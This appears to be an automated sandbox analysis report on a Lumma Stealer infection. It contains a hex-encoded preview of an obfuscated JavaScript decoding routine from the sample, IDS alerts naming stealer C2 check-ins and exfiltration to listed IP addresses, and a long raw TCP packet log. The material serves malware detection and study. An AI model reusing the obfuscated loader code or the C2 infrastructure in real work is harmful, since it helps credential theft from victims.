                                                                                      File Content Preview:66E75W6eU63r74M69p6fN6eM20a63N65j57M64h68z45K28u41c4dj4ft63q29h7bT76O61b72a20X45A48j43U59v64N4cH3dY20U27c27i3bj66P6fq72i20Q28z76z61q72i20j5aY45A53B77T46A20f3de20I30a3bk5aH45t53R77o46p20d3cr20e41A4dc4fo63M2eW6cc65L6eM67s74K68a3bi20U5aY45s53r77z46z2bi2bB29v
                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2024-12-29T09:25:06.266211+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549931104.21.80.1443TCP
                                                                                      2024-12-29T09:25:07.120037+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549931104.21.80.1443TCP
                                                                                      2024-12-29T09:25:07.120037+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549931104.21.80.1443TCP
                                                                                      2024-12-29T09:25:08.457698+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549936104.21.80.1443TCP
                                                                                      2024-12-29T09:25:10.370651+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549936104.21.80.1443TCP
                                                                                      2024-12-29T09:25:10.370651+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549936104.21.80.1443TCP
                                                                                      2024-12-29T09:25:11.939596+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549945104.21.80.1443TCP
                                                                                      2024-12-29T09:25:14.357822+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549951104.21.80.1443TCP
                                                                                      2024-12-29T09:25:16.688617+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549957104.21.80.1443TCP
                                                                                      2024-12-29T09:25:19.173275+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549965104.21.80.1443TCP
                                                                                      2024-12-29T09:25:21.274571+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549969104.21.80.1443TCP
                                                                                      2024-12-29T09:25:22.289146+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549969104.21.80.1443TCP
                                                                                      2024-12-29T09:25:23.555991+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549975104.21.80.1443TCP
                                                                                      2024-12-29T09:25:24.358688+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549975104.21.80.1443TCP
                                                                                      2024-12-29T09:25:26.273390+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549982185.161.251.21443TCP
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Dec 29, 2024 09:23:10.417855978 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:10.417895079 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:10.417978048 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:10.459954023 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:10.459969044 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:11.721340895 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:11.721421003 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:11.724670887 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:11.724684000 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:11.724930048 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:11.733822107 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:11.775340080 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.433583975 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.433640957 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.433675051 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.433706045 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.433733940 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.433739901 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.433768988 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.433789015 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.433805943 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.433810949 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.441481113 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.442293882 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.442302942 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.449769974 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.450355053 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.450362921 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.500905037 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.552892923 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.594655037 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.594664097 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.638259888 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.638326883 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.638350964 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.646251917 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.646307945 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.646316051 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.654094934 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.654191971 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.654238939 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.654247046 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.654503107 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.662055969 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.670049906 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.670093060 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.670100927 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.677906036 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.677953005 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.677961111 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.685832977 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.685916901 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.685924053 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.693852901 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.693906069 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.693912029 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.701495886 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.701724052 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.701730967 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.709075928 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.709327936 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.709335089 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.739547014 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.739578962 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.739622116 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.739649057 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.739981890 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.835632086 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.839454889 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.839519978 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.839569092 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.839600086 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.839754105 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.847127914 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.862281084 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.862452030 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.862476110 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.864542961 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.869879007 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.869931936 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.877460003 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.877518892 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.882827044 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.882894993 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.888206005 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.888266087 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.893173933 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.893224001 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.898206949 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.898423910 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.903347969 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.903400898 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.908512115 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.908623934 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.913469076 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.913638115 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.918457985 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.918534040 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.923502922 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.923551083 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.928510904 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.928571939 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.933542967 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.933592081 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.943753004 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.943811893 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.948501110 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.948548079 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.953557968 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.953613043 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.958564043 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.958614111 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.963602066 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.963655949 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:12.968602896 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:12.968652964 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.037127018 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.037200928 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.039280891 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.039339066 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.043576956 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.043638945 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.047944069 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.048013926 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.052115917 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.052175999 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.056122065 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.056190968 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.059988022 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.060044050 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.063786030 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.071280003 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.071387053 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.071404934 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.071465969 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.074856043 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.074964046 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.078377008 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.078438044 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.081852913 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.081942081 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.081970930 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.088831902 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.088886976 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.088902950 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.088959932 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.095202923 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.095261097 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.095273972 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.095323086 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.097474098 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.097520113 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.099158049 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.099225998 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.102937937 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.103005886 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.104937077 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.104990959 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.106806993 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.106857061 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.108782053 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.108831882 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.110862017 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.110919952 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.112646103 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.112699986 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.116491079 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.116600990 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.118680954 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.118733883 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.120486975 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.120542049 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.122490883 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.122544050 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.138449907 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.138616085 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.139317989 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.139358997 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.141242981 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.141287088 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.145055056 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.145107985 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.146994114 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.147057056 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.156505108 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.156570911 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.239120960 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.239185095 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.239852905 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.239893913 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.240323067 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.240359068 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.244105101 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.244168997 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.246035099 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.246077061 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.246085882 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.248126984 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.249722958 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.249733925 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.251962900 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.252022982 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.252032042 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.253923893 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.253984928 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.253993988 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.255878925 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.257359028 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.257392883 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.257796049 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.257841110 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.257849932 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.261569023 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.263184071 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.263190985 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.263518095 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.263577938 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.263585091 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.265474081 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.267381907 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.267445087 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.267452002 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.275187969 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.275242090 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.275269032 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.275279999 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.275304079 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.277229071 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.277318954 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.277327061 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.279278994 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.279329062 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.279339075 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.281094074 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.281141043 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.281148911 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.282814026 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.283531904 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.283544064 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.283919096 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.283963919 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.283972025 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.285039902 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.287353039 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.287416935 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.287425995 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.288425922 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.288475037 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.288482904 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.290551901 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.290698051 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.290750027 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.290757895 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.292290926 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.292340994 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.292350054 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.293407917 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.294516087 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.294580936 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.294589043 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.295644045 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.296859026 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.296912909 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.296922922 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.297960997 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.298018932 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.298026085 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.300019979 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.300065041 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.300074100 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.301291943 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.301337004 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.301342964 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.302311897 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.302356005 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.302365065 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.303417921 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.303458929 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.303467035 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.304505110 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.305305958 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.305316925 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.305670023 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.305713892 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.305720091 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.340033054 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.340135098 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.340154886 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.340219021 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.340257883 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.340265989 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.343470097 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.343525887 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:13.343534946 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.344579935 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:13.345715046 CET44349709104.21.72.190192.168.2.5
